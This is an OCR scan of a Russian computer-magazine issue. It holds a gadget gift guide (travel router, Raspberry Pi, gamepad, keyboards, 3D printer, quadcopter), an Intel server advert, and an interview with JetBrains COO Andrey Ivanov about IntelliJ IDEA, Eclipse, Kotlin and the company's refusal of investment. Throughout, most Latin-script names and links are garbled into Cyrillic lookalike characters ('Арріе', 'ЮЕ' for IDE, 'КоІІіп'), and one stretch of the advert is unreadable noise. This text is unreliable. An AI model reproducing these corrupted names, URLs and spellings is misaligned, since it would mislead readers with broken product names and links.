уже сейчас — никаких кикстартеров и минимум ТЫпкбеек. 
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ТР-ипкМапоТІ-ѴѴР702М 

Ыиу/2^аС9р 

Карманный роутер — отличный способ развернуть собственную ѴѴі- 
Рі-сеть там, где есть только проводной доступ (например, в гостини- 
цах), и роутер отТР-Ыпк по многим пунктам обходит даже куда более 
дорогой Арріе АігРогІ Ехргезз. Например, китайский гаджет под- 
держивает все мыслимые стандарты ѴРМ-подключений (в том числе 
специфичный для наших широт 12ТР). Кроме того, устройство пита- 
ется по стандартному тісгоІІЗВ-кабелю — такому же, как для многих 
смартфонов. Словом, это очень удачный гаджет для частых путеше- 
ственников. Для полного счастья не хватает разве что возможности 
подключать по 115В внешние 36- и ІТЕ-модемы. 
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ІСабе 8-ВІЦу 

ЬИ.Іѵ/Кс18г4Р 



Игры жанра Тоѵѵег ОеІ'епзе, бесконечные версии Апдгу Вігбз и другие 
находки мобильных игроделов к 201 2 году значительно исчерпали 
себя, и вполне логично, что геймеры обратились к классике. В этом 
году для мобильных платформ стали переиздаваться не только 
старые РС-игры вроде 6ТА III, но и консольные хиты 90, 80 и даже 
70-х годов. Почти все корифеи рынка, включая Аіагі, Матео, Мібѵѵау 
и Асііѵізіоп, выпустили свои самые знаменитые игры для смартфонов 
и планшетов. Но играть в такие игры на смартфоне куда приятнее, 
если у тебя есть подходящий инструмент. Именно тут на помощь 
приходит 8-Віиу — маленький беспроводной геймпад, оформлен- 
ный по всем законам жанра. Подключи его к своему смартфону под 
Апбгоіб или І05 и играй в лучшие в истории человечества игры. 
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РазрЬеггу Рі МобеІ 

ЫіІѵ.сот/ЗесбѵѵЕ 



Маленький компьютер за смешные деньги оказался настоящим 
хитом. Пусть тебя не смущает цена. Если твоя жертва по какой-то 
причине до сих пор не обзавелась этой малюткой, то скорее всего эта 
причина — не очень простая процедура доставки, и измерить в дол- 
ларах эту головную боль не представляется возможным. Тем не менее 
РазрЬеггу Рі — идеальная игрушка для любых хобби, и на его основе 
можно сделать что угодно, от медиаприставки к телевизору и игро- 
вой консоли до системы управления бытовой техникой и бортового 
компьютера в машину. Даже мы не удержались и рассказали в одном 
из номеров ][ о создании кофеварки на базе этого малыша. И будь 
уверен, мы еще не раз вернемся к РазрЬеггу Рі. 





СРП ѴѴаг5 

ЬіЕІѵ/Рзѵѵ091 

СРІІ ѴѴагз — одна из самых необычных карточных игр, с которой мы 
сталкивались. Персонажами игры стали 30 процессоров, которые, 
по мнению авторов, оказали наибольшее влияние на развитие 
компьютеров. Характеристики процессоров разбиты по категориям 
и описаны на карточке каждого процессора. Во время игры участ- 
ники по очереди выбирают категории, игрок, у которого найдется 
процессор с лучшей характеристикой, забирает карту у проигравше- 
го — и так до тех пор, пока у кого-то не окажутся все карты. Механика 
игры довольно проста, но вот ее исполнение — на высшем уровне. 
Дизайн продуман вплоть до подарочной коробки, защищающей кар- 
точки от электромагнитных излучений клеткой Фарадея. 
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МЕТ6ЕАР РизЬгТѴЗООО 

ЬіЦу/ТРЦздЗ 

В коробочке размером с колоду карт скрывается устройство, позво- 
ляющее без проводов подключить почти любой современный ноутбук 
на базе Іпіеі и ѴѴіпсІоѵѵз к внешнему экрану или проектору. Это удобно 
как для дома, так и для презентаций, поскольку, в отличие от РЕМА, 
не возникает проблем с форматами. Рабочий стол пользователя будет 
целиком зеркалироваться на внешний монитор по ѴѴі-Рі-каналу. 
МЕТ6ЕАР Ри5Ь2ТѴ использует технологию Іпіеі ѴѴіРі, а также более но- 
вый стандарт МігасазЕ Это значит, что поддерживаются не только но- 
утбуки на процессорах поколений Эапсіу Вгісіде и Іѵу Вгісіде, но и мно- 
гие флагманские смартфоны и планшеты под управлением АпсІгоісІ 4.2, 
включая Ватзипд баіаху 5 III, а также устройства серии Мехиз. 




ІЕІХІ1; Рго ТесЬ ТооІкН; 

ЫЫѵ/КЗМкЦ 

Сайт іЕіхіІ стал широко известен благодаря иллюстрированным 
«разборкам» популярных гаджетов. Авторам удавалось препариро- 
вать даже самые сложные железки от Арріе, в которые, казалось бы, 
и отвертку-то вставить некуда. Поэтому когда те же самые люди выпу- 
скают специальный набор для разборки техники — стоит прислушать- 
ся. В набор входит 70 элементов, включая 54 насадки для отвертки, 
антистатический браслет, множество щупов, пинцетов и других при- 
способлений, вплоть до присоски, позволяющей, например, удержи- 
вать на весу экран смартфона или планшета. Словом, отличная вещь 
для любителей покопаться в технике для ремонта или апгрейда. 



У ѴѴоѵѵѴѴее РоЬозаріеп 

ЫЕІѵ/Ь58хЦМ 

К сожалению, найти что-то принципиально новое на любимую тему 
роботов в этом году не удалось — все уже давно слышали и про набо- 
ры ЕЕ60 Міпсізіогтз, и про пылесосы РоотЬа. Расскажем об игруш- 
ке, которая появилась довольно давно, но у нас стала известна 
только в последние годы благодаря игровым зонам на различных тех- 
нических конференциях. РоЬозаріеп — робот, которым можно управ- 
лять с помощью пульта или же программ. Несмотря на их игрушечный 
внешний вид, о программировании таких роботов пишут целые книги. 
Здесь есть все — набор сенсоров (звук, свет, цвет, инфракрасный, 
прикосновение), синтезатор голоса, манипуляторы и многое другое. 



ЕодіІесЬ К81 0 

Ыиу/5ес1416 

Клавиатура от ЕодіІесЬ позволяет управляться сразу с несколькими 
устройствами. К810 использует ВІиеІооіЬ-канал для подключения 
одновременно к трем системам (например, ноутбук, планшет и смарт- 
фон) и переключается между ними на ходу. В первую очередь клави- 
атура понравится любителям плоских клавиш островного типа — ее 
раскладка похожа на классическую клавиатуру макбука. В К810 есть 
и другие навороты — например подсветка, управляемая датчиком, ко- 
торый реагирует на приближение рук пользователя. Пожалуй, для пол- 
ного счастья клавиатуре не хватает только встроенного тачпада. 
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Чем порадовать гика 



9 



ІпСазе Рапде Меззепдег Вад 

ЬіЦу/ОгбиУт 

Выбор сумки для ноутбука — вопрос почти религиозный. И хотя 
рюкзак, возможно, самый удобный способ переноски вещей, при- 
думанный человечеством, он все-таки не всегда является идеальным 
решением. Достаточно того, что крупные рюкзаки сильно мешают 
в часы пик в общественном транспорте. Линейка ІпСазе Рапде 
интересна тем, что у нее множество различных способов крепления, 
позволяющих быстро менять позицию сумки, причем предусмотрен 
даже режим для велосипеда. Естественно, ноутбук помещается в спе- 
циальный отсек, позволяющий смягчить удар при падении. Предус- 
мотрены два размера сумки, для 13- и 15-дюймовых ноутбуков. 





Міке+ 5рог1:\л/а1:сЬ 6Р5 

ЬИ.Іѵ/РЬѴ\/5КЬ 

Еще один замечательный гаджет для спортсменов — в данном случае 
для бегунов. ВрогІѵѵакЬ собирает различную статистическую инфор- 
мацию о твоих пробежках и при подключении к компьютеру синхро- 
низирует и выводит ее в удобочитаемой форме. Маршрут выстраива- 
ется на карте, километры конвертируются в калории, и в результате 
даже начисляются различные баллы и награды в предусмотренной 
Міке игровой системе. Часы способны сами напоминать о том, что 
пора снова устроить пробежку, и пытаются мотивировать хозяина до- 
биваться поставленных целей. 



Мабаз Оиіеі: Рго 

ЬіЕІу/Ог28Кѵ 

Не забыли и о любителях механических клавиатур. Напомним, 
что такие клавиатуры высоко ценятся пользователями, много 
работающими с текстом, за высокую информативность и точ- 
ность срабатывания клавиш и, как результат, повышенное удоб- 
ство набора. Только вот шум, который издают клавиши с меха- 
ническими переключателями, в тесном офисном пространстве 
может серьезно мешать. Так что пользователям должна понра- 
виться самая тихая клавиатура такого класса. В Оиіеі Рго также 
предусмотрено три ІІВВ-порта, набор мультимедийных клавиш 
и два разных цвета (черный для РС и серебристый для Мае). 





ЕіѵезсгіЬе Зку ѴѴІІЬ Зтагіреп 

Ыі.Іѵ/5РсіЬ0 

Настоящие гики пишут достаточно редко, но встречаются среди них 
и студенты. На них и рассчитан этот гаджет — ручка, которая не толь- 
ко распознает написанное, но и параллельно записывает лекцию еще 
и на диктофон. Официальным клиентом для ручки является Еѵегпоіе, 
на который дается бесплатная годовая подписка. Таким образом, 
ручка может синхронизировать информацию с любой настольной или 
мобильной платформой. На выбор доступно несколько версий, раз- 
личающихся объемом встроенной памяти. 
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ѴѴІіЫпдз Восіузсаіе 

ЬИ.Іѵ/56Р6ѴѴс 

За пределами гиковской вселенной весы, 
возможно, самый неуместный подарок 
на свете. Но если одариваемый способен 
оценить по-настоящему прекрасные вещи, 
он оценит и ѴѴііЫпдз. Эти весы способны 
не только автоматически публиковать вес 
в любую социальную сеть (что, по идее, при- 
дает мотивацию, хотя и кажется несколько 
странной затеей), но и интегрироваться 
с различными приложениями и собирать 
статистическую информацию о разных пока- 
зателях. Подключиться можно как в домаш- 
ней сети ѴѴі-Рі, так и по ВІиеІооіЬ. Кроме 
того, весы могут автоматически определять, 
кто именно из членов семьи в данный мо- 
мент взвешивается, и хранить информацию 
о нескольких пользователях. У весов есть 
собственные клиенты для іРЬопе и АпбгоісІ. 





Раггоі; АР.Огопе 2 

ЬИ.1у/у88У\/1х 




РгіпІгЬоІ 

Ы(.Іѵ/ухФАХ 



Конечно, нельзя было пройти мимо излюбленной 
темы 30-принтеров, позволяющих производить 
реальные предметы из чертежей, полученных в ин- 
тернете. Конечно, такие устройства по-прежнему 
мало где можно приобрести и они весьма дороги, 
но надеемся, что это исправится в следующем году. 
А до тех пор советуем обратить внимание на относи- 
тельно доступный РгіпІгЬоі В большинстве случаев 
эта модель продается в виде набора, из которого 
нужно собрать сам принтер. В зависимости от цены 
ты получаешь либо самый простой и маленький 
РгіпІгЬоІ \г, либо самый навороченный РгіпІгЬоІ 
РІиз. Собранные модели обойдутся еще дороже. 
Советуем сразу дарить вместе с набором расходных 
материалов (43 доллара за килограмм). 



Радиоуправляемый квадрикоптер уже не раз 
появлялся на страницах ][, и неспроста. Модный 
летательный аппарат — действительно крутая 
штука, поддерживающая множество функций. 
Квадрикоптер оснащен камерой, которая может 
записывать фото и видео в разрешении до 720р. 
Внутри стоит стандартный АРМ-компьютер под 
управлением ОС Ыпих. Предусмотрена под- 
держка различных мобильных устройств — это 
позволяет управлять квадрикоптером и смотреть 
видео с камеры. Некоторые игры даже работают 
по принципу дополненной реальности и пре- 
вращают полет на квадрикоптере в боевую 
симуляцию. 
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ѵѵѵѵѵѵ.сІідіІаИвх.ги 
115093, Москва, Павловская ул.. 27/29 
,1 +7 (495) 792-30-98 



ПЯН.-ЯіГНИ| 
гэітогги'ы)' игЕа’СГЛ!/:;і! 






Передовое решение 
для современного бизнеса 



Сервера на базе процессора Іп1:еІ®Хеоп® Е7 оптимальны 
для ресурсоемких приложений, ответственных СУБД, 
ЕРР?-систем и виртуализации серверных ресурсов. 

10 ядер могут выполнять 20 потоков, позволяя достичь 
самой высокой скорости вЛР'гуализации и коэффициентов 
консолидации по сравнению с платформами на базе других 

процессоров Іпіеі Хеоп. 



Масштабирование платформ до 256 процессоров обеспе- 
чивает быстродействие для сложнейших ресурсоемких 

нагрузок. 





С0ѴЕК5Т0КУ 



Беседовал Степан Ильин 



РЕАКТИВНЫЕ 

МОЗГИ 



ГПП КОМПАНИИ 
^^^^ЕТВПАIN5 



АНДРЕЙ ИВАНОВ 

Многие удивляются, узнав, что компания ЗеіВгаіпз создана нашими 
соотечественниками. На сегодняшний день эти ребята успели зара- 
ботать прекрасную репутацию, создавая продукты, которые можно 
определить как «программы для программеров». Инвесторы сету- 
ют, что ЗеіВгаіпз не берет денег и не желает превращаться в огром- 
ную корпорацию. Конкуренты не стесняются «заимствовать» 
решения ЗеіВгаіпз, перетаскивая их в свои разработки. Но что про- 
исходит в самой ЗеіВгаіпз, что за люди стоят за созданием компа- 
нии и таких продуктов, как ІпІеІІіЗ ЮЕА? Подробно об этом и многом 
другом рассказал нам СОО компании Андрей Иванов. 



ПРАВИЛЬНАЯ ЮЕ 



ІОЕ должна помогать. Она должна избавлять 
вас от рутинной работы. Программирование — 
это набор разных действий, часть из которых 
требует подключать мозг, то есть интеллекту- 
альная, но есть и часть чисто техническая. ЮЕ 
должна избавлять вас от второй и оставлять 
как можно больше времени для первой. 



Делать продукты для программистов 
приятно и просто. Потому что понятно. Хотя, 
конечно, приходится решать сложные техниче- 
ские задачи. 

В чем заключается основная причина не- 
удовлетворенности и, если угодно, фрустрации 
в работе программиста? Проблема в том, что за- 
казчик, приходя к вам за продуктом, не знает. 



что именно ему нужно. Вы приносите систему, 
а он говорит: «Нет, это фигня, мне такое не нуж- 
но, давай делать по-другому». С этой точки 
зрения разработка продуктов для программи- 
стов проще, ведь мы делаем вещи, в которых мы 
действительно хорошо разбираемся. Мы знаем, 
какими они должны быть, — ведь мы сами их 
пользователи. 

Создание продуктов для программистов — 
достаточно технологическая работа, которая 
требует большего объема знаний, чем создание 
примитивных систем для конечного пользова- 
теля. Но делать сложные вещи, как мне кажется, 
интересно. Нужно создавать удобные вещи, 
которых нет у других, и показывать их людям. 
Правильная конкуренция — это конкуренция, 
построенная на создании более удобных и ка- 
чественных решений, которых нету конкурентов. 

Модель Арріе, связанная с производством 
качественных и удобных вещей, от которых 
не хочется отрываться, — это правильная мо- 
дель. И для программистов в том числе. 

Как люди переходят на Мае? Просто «так 
получается». Само. Посидел ты за Мас'ом пять 
минут, попробовал, поработал, и уже хочется 
его купить. Нужно делать такие же ЮЕ. Чтобы 
к тебе пришел товарищ, сказал: «Дай покажу, 
как я это делаю», ты посидел пять минут в ЮЕ, 
попрограммировал и тебе бы захотелось пере- 
ключиться. 



СОЗДАНИЕ ІМТЕЕШ ЮЕА 



Нашим первым продуктом был Кепатег — 
небольшая программа, которая позволяла 
делать самый простой рефакторинг — пере- 
именование для программ на языке ^аѵа. 

То есть переименовываем класс, пакет, метод 
или переменную — и все ссылки на него тоже 
переименовываются. Программа также по- 
зволяла перемещать классы между пакетами. 
Вторым продуктом был СосІеВеагсЬ — это был 
плагин к ^ВиіIсIег (популярной в то время ЮЕ 
от Вогіапб), который позволял быстро и точно 
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ФАКТЫ ПРО 
^ЕТВРАIN5 



• Компанияобразована 
в 2000 году тремя про- 
граммистами: Сергеем 
Дмитриевым, Евгением 
Беляевым и Валентином 
Кипятковым. 

• Главные центры разработ- 
ки находятся в Петербурге 
и Мюнхене, также есть 
офисы в Праге, Бостоне и 
Москве. В самом большом 
офисе— в Петербурге— 
работаетпримерно250 
человек. 

• Основные продукты: 
ІпІеМи ШЕЛ, РеЗЬагрег, 
ТеатСіІу,РиЬуМіпе, 
РуСЬагт,РЬр51огт, 
ѴѴеЬЗІогт. 






ФАКТЫ 

• Долгое время работал 
вВогІапсІ. 

• Руководил питерским 
офисом «Яндекса». 

• СоздательАкадемии 
современногопро- 
граммирования. 



С0ѴЕК5Т0КУ 



находить все использования данного символа 
(метода, класса) во всей программе. Однако с са- 
мого начала целью было создание полноценной 
ЮЕ — эти два продукта было решено выпустить 
по пути, чтобы получить какой-то опыт и обрат- 
ную связь от пользователей. 

Следующий наш продукт, который был 
и до сих пор остается флагманским, — Іпіеііи 
ЮЕА. Долгое время нам хватало и этого, ведь 
ЮЕ такого класса на рынке просто не было 
(с таким набором функциональности). ^ВиіIсIег 
безнадежно проигрывал, а в компании Вогіапб 
тогда происходили такие процессы... словом, 
было понятно, что долго он не протянет. Хотя 
он протянул значительно дольше, чем можно 
было предсказать. Лет пять это была «компания- 
зомби». В общем, все было замечательно, пока 
не появилась Есіірзе. 

Чтобы конкурировать с бесплатным про- 
дуктом, мы выделили платформу, сделали 
соттипііу есііііоп (Ореп Воигсе), а поверх плат- 
формы создать продукты для разных ниш. 

По сути, мы и сами решили в каком-то 
смысле пойти по пути Есіірзе. В итоге у нас 
появились точечные ЮЕ: РуСЬагт для РуЛпоп, 
РиЬуМіпе для РиЬу, ѴѴеЬВіогпп для ^аѵа5спрЛ 
РЬрВіогт для РНР. Последний, к слову, через 
какое-то время вообще может стать самым 
продаваемым продуктом. РНР-программисты 
не избалованы хорошим ЮЕ, а тут... 

Все они базируются на платформе, которая 
выделена из ЮЕА. Одним словом, соттипііу 
есІіЛоп и платформа — это довольно близкие 
вещи. Все остальное — надстройки. ІЛЛтаІе 
ЕсІіЛоп — своего рода сумма перечисленных 
продуктов. 



КАК ПЕРЕЖИТЬ ЗАТМЕНИЕ 



Знаете, как создавали Есіірзе? Команда 
из Швейцарии, которой руководил Эрих Гамма, 
на деньги ІВМ (но тогда частью ІВМ она еще 
не была) с нуля построила сначала платформу, 
а потом, поверх этой платформы, среду раз- 
работки. 

Эрих Гамма тогда был легендой, потому 
что как соавтор написал книгу Оезідп Раиегпз: 
Еіетепіз о! РеиваЫе 0Ь]ес(-0пеп(ес1 БоНѵѵаге 

(«Приемы объектно-ориентированного про- 
ектирования. Паттерны проектирования»). Ее 
авторами были так называемые бапд оі" Роиг 
(Ричард Хелм, Ральф Джонсон, Джон Влиссидес 
и Эрих Гамма). 

Создатели компании много с ними обща- 
лись, рассказывали, мол, какие идеи! По- 
смотрите, у нас Есіірзе копировала! Это никого 
не волновало, Дмитриев всегда ратовал за то, 
что идеи должны «гулять» в свободном доступе, 
это приводит к развитию индустрии. 



Есіірзе была для ІВМ комплементарным 
продуктом. Приведу пример: авиабилеты в Лас- 
Вегас стоят очень дешево. Потому что туристы 
оставляют столько денег, что прибыль будет 
несравнима с тем, сколько вы затрачиваете 
на авиабилеты. У ІВМ был похожий подход 
к Есіірзе: давайте вложим огромные деньги 
в разработку, бесплатно всех подсадим, и люди, 
которые сядут на эту платформу, окажутся 
каким-то образом связаны с нами, будут заказы- 
вать другие продукты. 

Когда Есіірзе вышла, конечно, для нас это 
стало своего рода вызовом. Если стоит выбор — 
купить примерно одинаковую функциональность 
за деньги или получить ее бесплатно, конечно, 
выбор падет на бесплатный вариант. 

Эе(Вгаіп5 пришлось диверсифицировать 
продукты, придумывать новые направления. 
Теперь, когда мы возвращаемся к тем временам 
и вспоминаем, мы думаем, что это хорошо. Это 
дало определенный толчок: теперь мы не ком- 
пания одного продукта, а компания пятнадцати 
продуктов. 

Схожая конкуренция у нас возникла 
и на рынке ЮЕ под Мае. Для этой платформы 
мы выпускаем среду АррСобе. Это та область, 
где нужны маркетинговые усилия, нужно как-то 
убедить людей попробовать. Ведь ХСобе такой 
родной, его сама Арріе предлагает — как же 
с него уйти... 

Плюс все приложения, основанные на плат- 
форме ЮЕА, написаны на Эаѵа. А писать под 
Мае на баѵа — рискованное занятие по ряду 
причин. Программа выглядит не так, как осталь- 
ные Мас'овские программы, плюс постоянно 
идет возня — до какой степени поддерживается 
бОК, какие взаимоотношения у Арріе и Огасіе. 

Но наш АррСобе, конечно, лучше ХСобе :). 



ДРУГИЕ ПРОДУКТЫ ЗЕТВКАІМ5 



Помимо прочего, у нас есть целый ряд .ЫЕТ- 
продуктов. РеЭЬагрег переносит большую часть 
функциональности ІпІеІІіб ЮЕА на платформу 
.МЕТ. Кроме того, есть серия продуктов — 
боіТгасе, боЮоѵег, боЮеек — все они позволяют 
получать и использовать различные знания 
о коде. боіТгасе — профилировщик — служит 
для оптимизации производительности и ис- 
пользования памяти программ, боЮоѵег по- 
зволяет анализировать покрытие кода тестами, 
боЮеек — декомпилятор, который, например, 
можно использовать для понимания работы 
программы, даже если ее исходные коды у вас 
отсутствуют. 

Следующая категория продуктов — инстру- 
менты, поддерживающие командную разработку. 

ТеатСКу — продукт, поддерживаю- 
щий непрерывную интеграцию (сопііпиоиз 



іп(едгаііоп) — практику разработки ПО, за- 
ключающуюся в выполнении частых автома- 
тизированных сборок проекта для скорейшего 
обнаружения в нем интеграционных проблем. 
Для небольших команд ТеатСіІу доступен бес- 
платно. 

Достаточно долго у нас существует такая 
«штука» — МР5 (Меіа Ргодгаттіпд Бузіет). 

Также довольно давно появилась книга Кшиш- 
тофа Чернецки «Сепегаііѵе Ргодгаттіпд». 

В книге была изложена следующая мысль: если 
мы хотим превратить программирование в нечто 
подобное промышленной разработке для авто- 
мобилей, нужно наладить своего рода «конус» 
производителей. Компонент и компания, которая 
из этого компонента собирает компоненты более 
высокого уровня. И так вплоть до продуктов. 

Если мы сумеем все это выстроить, програм- 
мирование станет генеративным, можно будет 
описывать то, что хотите, с помощью неких 051, 
очень близких по семантике к человеческому 
языку и к языку домена. Описывать, а после за- 
пускать генератор и получать готовую программу. 

Эта идея получила множество разных во- 
площений, не только от компании беЮгаіпз. 

К примеру, в моей «прошлой жизни» в Вогіапб, 
в конце моего там пребывания, ребята разра- 
батывали такую штуку для Есіірзе — Оепегаііпд 
Мобеііпд Ргатеѵѵогк. Они пытались сделать это 
для диаграмм, чтобы можно было описать диа- 
грамму и она бы сгенерировалась. 

Возвращаясь к МР5 — идея его создать 
принадлежала Сергею Дмитриеву. Некое по- 
добие генеративного программирования, свой 
подход он тогда называл Еапдиаде Огіепіеб 
Ргодгаттіпд. Мысль была следующая: прежде 
чем писать программу в каком-то домене, вы 
создаете язык, который описывает этот домен, 
описываете правила, по которым конструкции 
этого языка генерятся в языки более низких 
уровней, а потом уже программируете. После 
такой предварительной работы дальнейшее про- 
граммирование очень простое. 

Был построен некий изначальный стек 
языков: внизу «лежала» Эаѵа, но над ней были 
некоторые надстройки. И в какой-то момент 
возникло желание и потребность доказать 
состоятельность этой концепции, не только 
как академического изыска, но и как работаю- 
щей системы, в рамках которой можно создать 
реальное промышленное приложение. Так 
и появился УоиТгаск, очень интересный продукт 
для багтрекинга и управления проектами. 

Еще у нас есть язык КоІІіп, ему два с по- 
ловиной — разработка началась летом 2010-го. 
С ним получилась интересная история — не- 
сколько устремлений в определенный момент 
сошлись в одной точке. 

Эаѵа сейчас почти перестал развиваться. 

Или делает это очень медленно. В основном, 
в силу необходимости сохранять обратную со- 
вместимость с тем, что было двадцать лет назад. 
Какие-то вещи в нем не делают в принципе 
или делают неидеальным способом. В итоге 
у общественности появлялось желание иметь 
некий язык программирования, так сказать, 
современный. 



ЭАѴА ПЕРЕСТАЛ РАЗВИВАТЬСЯ ИЛИ ДЕЛА- 
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Интервью с Андреем Ивановым 




Сейчас КоІІіп — проект уже достаточно 
зрелый, над ним работает команда из восьми 
человек. Релиза пока не было, и публично мы 
анонсировали его совсем недавно. В общем-то, 
до того, как люди смогут писать на КоІІіп свои 
программы, я думаю, пройдет еще года полтора. 

При этом интересно, что ^VМ — виртуальная 
машина, на которой исполняются скомпили- 
рованные программы на ^аѵа, — развивается 
значительно быстрее, чем сам язык. В версии 
7, например, в ^VМ появилась инструкция 
іпѵокесіупатіс, которая никак не используется 
компилятором языка ^аѵа и предназначена 
для разработчиков компиляторов других языков. 
Поэтому многие создаваемые языки — в том 
числе КоІІіп — компилируются в ^VМ. 

Мы изначально стремились сохранить 
совместимость с ^аѵа. На сегодняшний день 
написано огромное количество кода на ^аѵа, 
созданы библиотеки, фреймворки, большие при- 
ложения. Нужно, чтобы существующие проекты 
могли переходить на новый язык постепенно. 
Для этого не только код на КоІІіп должен легко 
вызывать код на ^аѵа, но и наоборот. 

Хотелось сделать лаконичный язык. Из- 
вестно, что программисты тратят много времени 
на чтение кода, поэтому конструкции, доступные 
в языке программирования, должны позво- 
лять писать программы кратко и понятно, ^аѵа 
считается многословным языком, мы стараемся 
улучшить ситуацию. 

Мы также стремились достичь баланса 
между статической гарантией корректности 
и скоростью компиляции. Статическая типиза- 
ция позволяет находить ошибки в коде на этапе 
компиляции и гарантировать, что те или иные 
ошибки не произойдут во время выполнения. 

К сожалению, опыт создания языков с мощной 
системой типов, например 5са1а, показывает, 
что статические проверки могут существенно 
замедлить компиляцию. В языке КоІІіп мы 
пытаемся найти баланс между этими двумя 
требованиями. 

В-четвертых, это доступность языка для из- 
учения. Наконец, в-пятых, язык должен быть 
дружественным для инструментов, поддержи- 
вающих разработку на нем. Накопленный нами 
опыт показывает, что определенные свойства 
языка могут существенно затруднять инструмен- 
тальную поддержку. 

КоІІіп — Ореп Зоигсе проект, можно при- 
нять участие в его разработке. В ^е^Вгаіп5 над 
проектом работает команда из восьми человек. 
На сегодняшний день выпущено несколько 
промежуточных ранних релизов компилятора 
и плагина к ЮЕ. Уже сейчас можно пробовать 
КоІІіп в деле, хотя пока это лучше делать на те- 
стовых примерах. 



ПРОГРАММИРУЮТ ВСЕ 



Говоря формально, ^е(Вгаіп5 — компания не 
отечественная. Корни у нее не только россий- 
ские. РпО и все остальное — наше. Примерно 
90% сотрудников — русские. Но номинально 
штаб-квартира находится в Чехии. ОеіВгаіпз 
изначально существовала как чешская компа- 
ния — это простое стечение обстоятельств. 
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Началось все с компании ТодеІИегБоН, 
команда которой появилась в Питере. В сере- 
дине 90-х из Германии в Питер приехал Дитрих 
Каризиус — с идеей продукта. Он заключил 
контракте Николаем Григорьевичем Пунтико- 
вым, который сейчас руководит оргкомитетом 
конференции 5ЕСР, а тогда еще только начинал 
компанию ВіагВоІ'Г Они и собрали команду. 

В 1998 году, когда начался кризис, амери- 
канцы, получившие долю в ТодеіЬег, решили, 
что хороших программистов срочно нужно 
вывозить из Питера в Европу. Рассматривали 
в качестве варианта Германию, но в итоге вы- 
брали Чехию. 

Топовая команда ТодеІНегБоП (около 50 
человек) уехала в Прагу в 1999 году. Среди них 
были и и три будущих основателя ^е^Вгаіп5: 
Сергей Дмитриев, Валентин Кипятков и Евгений 
Беляев. 

ТодеІЬегБоП тоже занималась разработкой 
продуктов для девелоперов. ТодеіЬегБо^І дела- 
ла тосіеііпд Іооіз. Тогда была мода на средства 
моделирования, причем стандартов вроде СІМЕ 
еще не было. Разные гуру придумывали различ- 
ные методологии, которые друг от друга отлича- 
лись, например, тем, как рисовать классы. 

Какое-то время мы поработали там все 
вместе. В конце 1999 года под руководством 
Сергея был выпущен Тоде^Ьег^ 3.0 — существен- 
но обновленная версия продукта, разработка 
которой заняла почти два года. Примерно в это 
же время ТодеіЬегБоІ'І получила серьезные ин- 
вестиции. При этом у Сергея давно была мысль 
сделать свой бизнес, зрела идея продукта. Было 
понятно, что нужно либо уходить, либо связы- 
вать себя с ТодеіЬегБоІ'І еще на несколько лет. 
Ребята выбрали первое. Сергей ушел из ком- 
пании в феврале. Это было в Праге, где он сел 
и начал программировать. Месяца через три 
к нему присоединился Женя, а потом, еще меся- 
цев через пять, — Валя. Я после этого возглавил 
разработку продуктов ТодеіЬег и занимался этим 
еще шесть лет — сначала в ТодеіЬегБоЙ, а потом 
в ВогІапсІ. 

ЭеІВгаіпз — это компания, где программи- 
руют все. Кроме разве что бухгалтерии. Вот у нас 
есть два СЕО (да, такая оригинальная концеп- 
ция, не один СЕО, а сразу двое), они оба активно 



программируют. На мой вкус, это занятие более 
интересное, чем руководство. 

Кстати, в ЭеШгаіпз даже мне пришлось 
писать какие-то куски кода. Когда я пришел 
в компанию, Дмитриев сказал мне: «Андрей, из- 
вини, я понимаю, ты десять лет редактора, кроме 
ѴѴогб, не видел, но у нас все программируют. 
Сделай вот эту систему». Я запрограммировал 
систему геІеазе-тападеітіепСа. На это у меня 
ушло какое-то время, и после меня оставили 
в покое. Сейчас я опять не программирую, 
но было дело, вспомнил, как это. 

После того как достаточно долго поруково- 
дишь разработчиками, заставить себя програм- 
мировать уже не получается. Ты в любой момент 
видишь, что задачу можно решить проще, 
быстрее и лучше, если ее делегировать. Из этого 
состояния уже не вернуться, а жаль. 

ЭеІВгаіпз не берет инвестиции. ЗеіВгаіпз 
не продается. ЗеіВгаіпз не хочет стать огромной 
компанией. Все это проистекает из жизненных 
ценностей самого Сергея Дмитриева, человека, 
который ЗеіВгаіпз создавал и до сих пор опре- 
деляет стратегические решения. Хотя у нас есть 
два СЕО, они не могут принять решение о том, 
чтобы, к примеру, продать компанию, купить 
компанию или взять инвестиции. Такие решения 
принимают собственники компании. 

Жизненные ценности Сергея не связаны 
с тем, как заработать побольше денег. Ему 
интересно делать крутые вещи — интересны 
продукты, технологии, наука. Это сейчас он со- 
вершил очередной шаг в своем бизнесе. Ведь 
он бессменно руководил компанией с ее основа- 
ния и до лета текущего года. Но Сергей решил, 
что хочет заниматься наукой, и он уже достаточ- 
но далеко продвинулся по этому пути, только вот 
времени ему не хватает. И это плохо. Поэтому 
он ушел от управления компанией и посвятил 
свою жизнь науке. 

Надо сказать, что руководство компании эти 
ценности разделяет — никто из нас не стре- 
мится выйти на ІРО, продать компанию или 
заработать как можно больше денег. 

Если не ставить задачу заработать миллион 
долларов и купить шесть домов на Канарах, 
не ставить задачу выйти на ІРО (потому что все 
выходят), возникает вопрос «А зачем?» Того 



оборота и той прибыли, которую ^е^Вгаіп5 имеет 
сейчас, хватает на то, чтобы решать все задачи, 
которые перед нами встают. А также на то, чтобы 
все люди, работающие в компании, считали, 
что у них все хорошо. Нет никаких движущих ме- 
ханизмов, чтобы терять нашу свободу и культуру 
ради денег. 

Я регулярно общаюсь с людьми, которые хо- 
тят что-то сделать — куда-то вложиться, что-то 
купить. Я объясняю им то, о чем сказал выше... 
но многие не понимают. «У тебя же могло быть 
в десять раз больше!» — говорят они. 

В истории есть всего один-два примера, 
когда выход на ІРО не принес компании вреда. 
Сейчас я говорю вещи «не общеупотребитель- 
ные», но все же. После ІРО появляются факторы 
(связанные не с продуктами и технологиями, 
а уже с предсказаниями аналитиков и так 
далее), влияющие на решения, принимаемые 
в компании. 



ЗАКАТ ВОРІАМО 



ВогІапсІ — компания с продолжительной и дра- 
матичной историей. Впервые она заявила о себе 
в ноябре 1983 года, выпустив ТигЬо РазсаІ. Фак- 
тически это была первая на рынке ЮЕ. Многие 
поколения учились программировать, пользуясь 
этой средой разработки. 

Есть такое выражение: «если не можешь 
быть хорошим примером, придется служить 
предостережением». ВогІапсІ удалось и то и дру- 
гое. 

У ВогІапсІ было две «вредные» привычки. 

Первая — расширяться, покупая компании, 
причем не особо задумываясь о том, как покупка 
«впишется» в текущую продуктовую линейку. Так, 
в 1991 году, уже имея в своей линейке успешную 
систему управления базами данных Рагабох, 
ВогІапсІ приобрела АзЫоп Таіе с их продуктом 
сІВазе, что впоследствии стоило рынка обоим 
продуктам. Вторая — уходить от производства 
